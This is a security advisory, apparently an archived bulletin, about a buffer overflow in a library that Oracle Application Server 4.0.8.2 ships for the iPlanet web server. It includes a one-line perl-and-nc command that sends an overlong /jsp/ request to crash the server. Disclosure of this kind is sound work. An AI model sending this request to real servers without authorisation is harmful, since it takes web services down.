Vulnerability

    Oracle

Affected

    Oracle application server 4.0.8.2 + iWS 4.0/4.1 webserver

Description

    Following is based on a  S.A.F.E.R. Security Bulletin 0016.   They
    have been  able to  reproduce this  on 2  different machines, with
    very similar setup.

    An exploitable  buffer overflow  has been  identified in  a shared
    library  which  is  being  shipped  with Oracle Application Server
    4.0.8.2, and  used by  iPlanet Web  Server if  it is configured as
    external web-listener.

    iWS has  to be  configured as  external `web  listener' for Oracle
    Application  Server,  so  that  iWS  will  load  a  shared library
    ($ORAHOME/ows/4.0/lib/ndwfn4.so)  to  handle  requests  for   OAS.
    Overflow happens when a long string is requested with prefix  that
    has been `linked' to OAS (by  default it is /jsp/). which is  then
    passed to the  library routines to  be processed.   Buffer size is
    around 2050-60 bytes.

    A request similar to:

        GET /jsp/<A x 2050> HTTP/1.0

        (perl -e 'print "GET /jsp/","A"x2050," HTTP/1.0\n\n"' | nc victim 80)

    will trigger the overflow  (iWS webserver should core-dump  and be
    restarted by  watchdog; externally  it will  be seen  as a dropped
    connection).   It  is  also   possible  that  other  versions   of
    OAS/iWS/Solaris are vulnerable.

    S.A.F.E.R. have developed a working exploit for this problem which
    will be publicly released.  Credit goes to Fyodor Yarochkin.

Solution

    Oracle has been contacted, but they haven't been able to reproduce
    this problem.  S.A.F.E.R. would appreciate if people using OAS/iWS
    could test  this against  their servers  and let  both us know the
    results as other versions of  the software might be vulnerable  as
    well (tested on Solaris).   Oracle Security Team would  appreciate
    the results to be sent to secalert_us@oracle.com and S.A.F.E.R. to
    security@relaygroup.com.  No  fixes are available  at the time  of
    this writing.